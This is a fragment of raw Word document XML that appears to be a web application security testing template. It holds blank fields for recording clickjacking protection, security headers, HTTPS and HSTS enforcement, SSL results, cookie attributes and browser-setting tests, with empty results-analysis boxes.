                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Yes/No, iframe Loading Behavior Observed</w:t>
            </w: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0E06B938" w14:textId="77777777" w:rsidR="00A312B9" w:rsidRDefault="00A312B9" w:rsidP="003F3ACD">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left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02C7C82D" w14:textId="674BF4A3" w:rsidR="00A312B9" w:rsidRDefault="00A312B9" w:rsidP="003F3ACD">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left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A312B9" w:rsidRPr="000B6909" w14:paraId="6084FA0C" w14:textId="77777777" w:rsidTr="0044298F">
        <w:trPr>
          <w:trHeight w:val="1043"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2588" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="71B88601" w14:textId="46EE09D9" w:rsidR="00A312B9" w:rsidRPr="00A312B9" w:rsidRDefault="00A312B9" w:rsidP="004429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 w:rsidRPr="00A312B9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Clickjacking Protection Implemented?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6772" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2850B5BB" w14:textId="77777777" w:rsidR="00A312B9" w:rsidRDefault="00A312B9" w:rsidP="003F3ACD">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left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="00CC3CFC" w:rsidRPr="00CC3CFC">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:iCs/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Yes/No, Test Results of Overlay Interaction</w:t>
            </w:r>
            <w:r w:rsidR="00CC3CFC"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4FF4B66E" w14:textId="77777777" w:rsidR="00CC3CFC" w:rsidRDefault="00CC3CFC" w:rsidP="003F3ACD">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left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4EF9CEF2" w14:textId="36D033F6" w:rsidR="00CC3CFC" w:rsidRDefault="00CC3CFC" w:rsidP="003F3ACD">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left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5B7968" w:rsidRPr="000B6909" w14:paraId="24AB6521" w14:textId="77777777" w:rsidTr="0044298F">
        <w:trPr>
          <w:trHeight w:val="1043"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2588" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="76030A13" w14:textId="669AA61F" w:rsidR="005B7968" w:rsidRPr="00A312B9" w:rsidRDefault="005B7968" w:rsidP="004429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lastRenderedPageBreak/>
              <w:t xml:space="preserve">Other </w:t>
            </w:r>
            <w:r w:rsidRPr="005B7968">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:bCs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6772" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="45DFB4F3" w14:textId="77777777" w:rsidR="005B7968" w:rsidRDefault="005B7968" w:rsidP="003F3ACD">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left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[*</w:t>
            </w:r>
            <w:r w:rsidRPr="005B7968">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:iCs/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Frame Injection, Clickjacking, Lack of CSP or X-Frame-Options, etc.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:iCs/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B49E793" w14:textId="77777777" w:rsidR="005B7968" w:rsidRDefault="005B7968" w:rsidP="003F3ACD">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left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  <w:p w14:paraId="6DA66CDE" w14:textId="1B88E712" w:rsidR="005B7968" w:rsidRDefault="005B7968" w:rsidP="003F3ACD">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:iCs/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003F3ACD" w:rsidRPr="000B6909" w14:paraId="60B15733" w14:textId="77777777" w:rsidTr="0044298F">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2588" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="62769EFB" w14:textId="77777777" w:rsidR="003F3ACD" w:rsidRPr="000B6909" w:rsidRDefault="003F3ACD" w:rsidP="0044298F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B6909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772" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7BBDF1B3" w14:textId="77777777" w:rsidR="003F3ACD" w:rsidRPr="000B6909" w:rsidRDefault="003F3ACD" w:rsidP="003F3ACD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="215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0EE5D28" w14:textId="77777777" w:rsidR="003F3ACD" w:rsidRPr="000B6909" w:rsidRDefault="003F3ACD" w:rsidP="003F3ACD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="21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378AE90" w14:textId="77777777" w:rsidR="003F3ACD" w:rsidRPr="000B6909" w:rsidRDefault="003F3ACD" w:rsidP="003F3ACD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="21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7CD746D" w14:textId="77777777" w:rsidR="003F3ACD" w:rsidRPr="000B6909" w:rsidRDefault="003F3ACD" w:rsidP="003F3ACD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="21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FF83039" w14:textId="77777777" w:rsidR="003F3ACD" w:rsidRPr="000B6909" w:rsidRDefault="003F3ACD" w:rsidP="003F3ACD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="21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F5EBE25" w14:textId="77777777" w:rsidR="003F3ACD" w:rsidRPr="000B6909" w:rsidRDefault="003F3ACD" w:rsidP="003F3AC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4767C444" w14:textId="77777777" w:rsidR="00232512" w:rsidRDefault="00232512" w:rsidP="00232512">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D2C80">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Results Analysis: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E145A8" w14:textId="77777777" w:rsidR="00232512" w:rsidRPr="00B07F1E" w:rsidRDefault="00232512" w:rsidP="00232512">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b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2512" w:rsidRPr="005D2C80" w14:paraId="746EA268" w14:textId="77777777" w:rsidTr="005232C4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="473A3FE2" w14:textId="77777777" w:rsidR="00232512" w:rsidRPr="005D2C80" w:rsidRDefault="00232512" w:rsidP="005232C4">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="20B192B3" w14:textId="77777777" w:rsidR="00232512" w:rsidRPr="005D2C80" w:rsidRDefault="00232512" w:rsidP="005232C4">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5755AF73" w14:textId="77777777" w:rsidR="00232512" w:rsidRDefault="00232512" w:rsidP="005232C4">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0D38A121" w14:textId="77777777" w:rsidR="00232512" w:rsidRDefault="00232512" w:rsidP="005232C4">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="508A1401" w14:textId="77777777" w:rsidR="00232512" w:rsidRDefault="00232512" w:rsidP="005232C4">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5C2E39DC" w14:textId="77777777" w:rsidR="00232512" w:rsidRPr="005D2C80" w:rsidRDefault="00232512" w:rsidP="005232C4">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7AD9D93A" w14:textId="77777777" w:rsidR="00FC4783" w:rsidRDefault="00FC4783" w:rsidP="00A621A8">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left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8B6D35" w:rsidRPr="00A51A96" w14:paraId="6548747E" w14:textId="77777777" w:rsidTr="00C65506">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9140" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="13ACBFD8" w14:textId="5EBC2CA4" w:rsidR="008B6D35" w:rsidRPr="003C713F" w:rsidRDefault="008B6D35" w:rsidP="005232C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462042">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Test 12.</w:t>
            </w:r>
            <w:r w:rsidR="008B4FFA">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidRPr="0046204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2F7AB5" w:rsidRPr="002F7AB5">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Test with User Protection via Browser Settings</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2E6FE59C" w14:textId="77777777" w:rsidR="008B6D35" w:rsidRPr="00C65506" w:rsidRDefault="008B6D35" w:rsidP="00A621A8">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left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55"/>
        <w:gridCol w:w="6705"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C779B5" w:rsidRPr="00C779B5" w14:paraId="70B270B0" w14:textId="77777777" w:rsidTr="00C65506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4410A1EA" w14:textId="77777777" w:rsidR="00C779B5" w:rsidRPr="00C779B5" w:rsidRDefault="00C779B5" w:rsidP="00C6550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79B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705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D207196" w14:textId="77777777" w:rsidR="00C779B5" w:rsidRPr="00C779B5" w:rsidRDefault="00C779B5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779B5" w:rsidRPr="00C779B5" w14:paraId="3EE1A3B3" w14:textId="77777777" w:rsidTr="00C65506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089A110B" w14:textId="77777777" w:rsidR="00C779B5" w:rsidRPr="00C779B5" w:rsidRDefault="00C779B5" w:rsidP="00C6550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79B5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705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="198C8547" w14:textId="77777777" w:rsidR="00C779B5" w:rsidRPr="00C779B5" w:rsidRDefault="00C779B5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779B5" w:rsidRPr="00C779B5" w14:paraId="7FBB5093" w14:textId="77777777" w:rsidTr="00C65506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7151D8A0" w14:textId="77777777" w:rsidR="00C779B5" w:rsidRPr="00C779B5" w:rsidRDefault="00C779B5" w:rsidP="00C6550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79B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705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6BF060B8" w14:textId="77777777" w:rsidR="00C779B5" w:rsidRPr="00C779B5" w:rsidRDefault="00C779B5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779B5" w:rsidRPr="00C779B5" w14:paraId="2AC50753" w14:textId="77777777" w:rsidTr="00C65506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00F2098" w14:textId="77777777" w:rsidR="00C779B5" w:rsidRPr="00C779B5" w:rsidRDefault="00C779B5" w:rsidP="00C6550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79B5"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Browser Settings </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F625789" w14:textId="77777777" w:rsidR="00C779B5" w:rsidRPr="00C779B5" w:rsidRDefault="00C779B5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779B5" w:rsidRPr="00C779B5" w14:paraId="77F4B0B5" w14:textId="77777777" w:rsidTr="00C65506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63B6CC00" w14:textId="14DE3990" w:rsidR="00C779B5" w:rsidRPr="00C779B5" w:rsidRDefault="005D0F4F" w:rsidP="00C6550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D0F4F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>HTTP Response Headers Analyzed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0DFC1C63" w14:textId="77777777" w:rsidR="00C779B5" w:rsidRPr="00BB2F5E" w:rsidRDefault="005D0F4F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BB2F5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BB2F5E" w:rsidRPr="00BB2F5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CSP, X-Content-Type-Options, X-Frame-Options – Properly Configured? Yes/No]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B8DF0A8" w14:textId="77777777" w:rsidR="00BB2F5E" w:rsidRDefault="00BB2F5E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74472CB" w14:textId="4B072913" w:rsidR="00BB2F5E" w:rsidRPr="00C779B5" w:rsidRDefault="00BB2F5E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AF0DE9" w:rsidRPr="00C779B5" w14:paraId="768589D6" w14:textId="77777777" w:rsidTr="00C65506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069BA1DC" w14:textId="1C53F2FA" w:rsidR="00AF0DE9" w:rsidRPr="005D0F4F" w:rsidRDefault="00AF0DE9" w:rsidP="00C6550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F0DE9">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>JavaScript Disabled - Application Behavior</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C6ACD11" w14:textId="77777777" w:rsidR="00AF0DE9" w:rsidRDefault="00AF0DE9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E5C4D" w:rsidRPr="00CE5C4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Bypassed Client-Side Validation? Features Broken?</w:t>
            </w:r>
            <w:r w:rsidR="00CE5C4D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5426B05" w14:textId="77777777" w:rsidR="00CE5C4D" w:rsidRDefault="00CE5C4D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1DCB754" w14:textId="77777777" w:rsidR="00CE5C4D" w:rsidRDefault="00CE5C4D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B9D2447" w14:textId="19C76CD6" w:rsidR="00C65506" w:rsidRPr="00BB2F5E" w:rsidRDefault="00C65506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D32742" w:rsidRPr="00C779B5" w14:paraId="43F39210" w14:textId="77777777" w:rsidTr="00C65506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6DA82EED" w14:textId="471D7DCE" w:rsidR="00D32742" w:rsidRPr="00AF0DE9" w:rsidRDefault="00D32742" w:rsidP="00C6550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D32742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HTTPS Enforcement Tested?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06ADABDE" w14:textId="77777777" w:rsidR="00D32742" w:rsidRDefault="00D32742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D32742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HSTS Implemented? HTTP to HTTPS Redirection?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9D2A56A" w14:textId="77777777" w:rsidR="00D32742" w:rsidRDefault="00D32742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81D37D3" w14:textId="3CF0359A" w:rsidR="00D32742" w:rsidRDefault="00D32742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196D1A" w:rsidRPr="00C779B5" w14:paraId="55369321" w14:textId="77777777" w:rsidTr="00C65506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284DD40A" w14:textId="2CC30AED" w:rsidR="00196D1A" w:rsidRPr="00D32742" w:rsidRDefault="00196D1A" w:rsidP="00C6550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96D1A">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>SSL Security Verified?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7B1B2066" w14:textId="77777777" w:rsidR="00196D1A" w:rsidRDefault="00196D1A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196D1A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SSL Labs Test Results – Secure/Weak?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343C7073" w14:textId="77777777" w:rsidR="00196D1A" w:rsidRDefault="00196D1A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CCC506F" w14:textId="5E03FFCD" w:rsidR="00196D1A" w:rsidRDefault="00196D1A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E6F46" w:rsidRPr="00C779B5" w14:paraId="02E44A8A" w14:textId="77777777" w:rsidTr="00C65506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29F1D37C" w14:textId="61505E80" w:rsidR="005E6F46" w:rsidRPr="00196D1A" w:rsidRDefault="005E6F46" w:rsidP="00C6550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5E6F46">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Cookie Security Analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70EC69FF" w14:textId="77777777" w:rsidR="005E6F46" w:rsidRDefault="005E6F46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5E6F4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Secure, HttpOnly, SameSite Attributes Set? Yes/No, Any Manipulation Possible?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117570B" w14:textId="77777777" w:rsidR="005E6F46" w:rsidRDefault="005E6F46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D4B0AA6" w14:textId="3D19672E" w:rsidR="005E6F46" w:rsidRDefault="005E6F46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CC7D68" w:rsidRPr="00C779B5" w14:paraId="766E3A13" w14:textId="77777777" w:rsidTr="00C65506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933C8FB" w14:textId="183D0DE8" w:rsidR="00CC7D68" w:rsidRPr="005E6F46" w:rsidRDefault="00CC7D68" w:rsidP="00C6550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C7D68">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Pop-up Blocking &amp; Privacy Settings</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6778DA31" w14:textId="77777777" w:rsidR="00CC7D68" w:rsidRDefault="00CC7D68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CC7D68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Application Bypasses Pop-up Blocking? Yes/No, Observations?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23F4695" w14:textId="77777777" w:rsidR="00CC7D68" w:rsidRDefault="00CC7D68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2B21F79" w14:textId="6CD2308B" w:rsidR="00CC7D68" w:rsidRDefault="00CC7D68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AD022E" w:rsidRPr="00C779B5" w14:paraId="5C183576" w14:textId="77777777" w:rsidTr="00C65506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0B919ACB" w14:textId="72D2D928" w:rsidR="00AD022E" w:rsidRPr="00CC7D68" w:rsidRDefault="00AD022E" w:rsidP="00C6550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D022E">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Tracking Protection &amp; Third-Party Script Dependencies</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C0BEFE1" w14:textId="77777777" w:rsidR="00AD022E" w:rsidRDefault="00AD022E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AD022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Breaks Critical Functionality? Yes/No, Observations?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C95DA5E" w14:textId="77777777" w:rsidR="00AD022E" w:rsidRDefault="00AD022E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76E4A42" w14:textId="77777777" w:rsidR="00AD022E" w:rsidRDefault="00AD022E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BEC1CC2" w14:textId="3CA81F20" w:rsidR="00957ECC" w:rsidRDefault="00957ECC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7C072B" w:rsidRPr="00C779B5" w14:paraId="77A5E8B2" w14:textId="77777777" w:rsidTr="00C65506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B96F784" w14:textId="7F662A9D" w:rsidR="007C072B" w:rsidRPr="00AD022E" w:rsidRDefault="007C072B" w:rsidP="00C6550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7C072B">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Disabled Cookie Handling - Application Behavior</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4788B60E" w14:textId="77777777" w:rsidR="007C072B" w:rsidRDefault="007C072B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7C072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Breaks Session Management? Yes/No, Observations?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93F5148" w14:textId="77777777" w:rsidR="007C072B" w:rsidRDefault="007C072B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4359AEF" w14:textId="77777777" w:rsidR="007C072B" w:rsidRDefault="007C072B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9A26FC0" w14:textId="0E74573A" w:rsidR="00957ECC" w:rsidRDefault="00957ECC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C779B5" w:rsidRPr="00C779B5" w14:paraId="2BD74420" w14:textId="77777777" w:rsidTr="00C65506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012BFD3A" w14:textId="375B867F" w:rsidR="00C779B5" w:rsidRPr="00C779B5" w:rsidRDefault="005B4AF3" w:rsidP="00C6550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5B4AF3">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b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6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F9E5C16" w14:textId="77777777" w:rsidR="00C779B5" w:rsidRPr="00C779B5" w:rsidRDefault="00C779B5" w:rsidP="00C779B5">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="217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93F6C71" w14:textId="77777777" w:rsidR="00C779B5" w:rsidRPr="00C779B5" w:rsidRDefault="00C779B5" w:rsidP="00C779B5">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="21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1301617" w14:textId="77777777" w:rsidR="00C779B5" w:rsidRPr="00C779B5" w:rsidRDefault="00C779B5" w:rsidP="00C779B5">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="21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CCC22DB" w14:textId="77777777" w:rsidR="00C779B5" w:rsidRPr="00C779B5" w:rsidRDefault="00C779B5" w:rsidP="00C779B5">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="21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E6215BB" w14:textId="77777777" w:rsidR="00C779B5" w:rsidRPr="00C779B5" w:rsidRDefault="00C779B5" w:rsidP="00C779B5">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="21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3E88F89" w14:textId="77777777" w:rsidR="00C779B5" w:rsidRPr="00C779B5" w:rsidRDefault="00C779B5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C779B5" w:rsidRPr="00C779B5" w14:paraId="56A761FE" w14:textId="77777777" w:rsidTr="00C65506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7C5D52CB" w14:textId="77777777" w:rsidR="00C779B5" w:rsidRPr="00C779B5" w:rsidRDefault="00C779B5" w:rsidP="00C65506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79B5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705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="233E276A" w14:textId="77777777" w:rsidR="00C779B5" w:rsidRPr="00C779B5" w:rsidRDefault="00C779B5" w:rsidP="00C779B5">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="218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27AD61E" w14:textId="77777777" w:rsidR="00C779B5" w:rsidRPr="00C779B5" w:rsidRDefault="00C779B5" w:rsidP="00C779B5">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="21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D74F0BF" w14:textId="77777777" w:rsidR="00C779B5" w:rsidRPr="00C779B5" w:rsidRDefault="00C779B5" w:rsidP="00C779B5">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="21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A44C3E6" w14:textId="77777777" w:rsidR="00C779B5" w:rsidRPr="00C779B5" w:rsidRDefault="00C779B5" w:rsidP="00C779B5">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="21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B1C39B3" w14:textId="77777777" w:rsidR="00C779B5" w:rsidRPr="00C779B5" w:rsidRDefault="00C779B5" w:rsidP="00C779B5">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="21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4DE7E7D" w14:textId="77777777" w:rsidR="00C779B5" w:rsidRPr="00C779B5" w:rsidRDefault="00C779B5" w:rsidP="00C779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3C84CBC9" w14:textId="77777777" w:rsidR="00A9609F" w:rsidRDefault="00A9609F" w:rsidP="00A9609F">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D2C80">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Results Analysis: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8AA221" w14:textId="77777777" w:rsidR="00A9609F" w:rsidRPr="00B07F1E" w:rsidRDefault="00A9609F" w:rsidP="00A9609F">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b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9609F" w:rsidRPr="005D2C80" w14:paraId="274C42C1" w14:textId="77777777" w:rsidTr="005232C4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A7AAA19" w14:textId="77777777" w:rsidR="00A9609F" w:rsidRPr="005D2C80" w:rsidRDefault="00A9609F" w:rsidP="005232C4">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2EDC6051" w14:textId="77777777" w:rsidR="00A9609F" w:rsidRPr="005D2C80" w:rsidRDefault="00A9609F" w:rsidP="005232C4">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5767D818" w14:textId="77777777" w:rsidR="00A9609F" w:rsidRDefault="00A9609F" w:rsidP="005232C4">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="45D9F44C" w14:textId="77777777" w:rsidR="00A9609F" w:rsidRDefault="00A9609F" w:rsidP="005232C4">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="557DF0CF" w14:textId="77777777" w:rsidR="00A9609F" w:rsidRDefault="00A9609F" w:rsidP="005232C4">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5B8C0FF0" w14:textId="77777777" w:rsidR="00A9609F" w:rsidRPr="005D2C80" w:rsidRDefault="00A9609F" w:rsidP="005232C4">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="308620E4" w14:textId="77777777" w:rsidR="008B4FFA" w:rsidRDefault="008B4FFA" w:rsidP="00A621A8">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
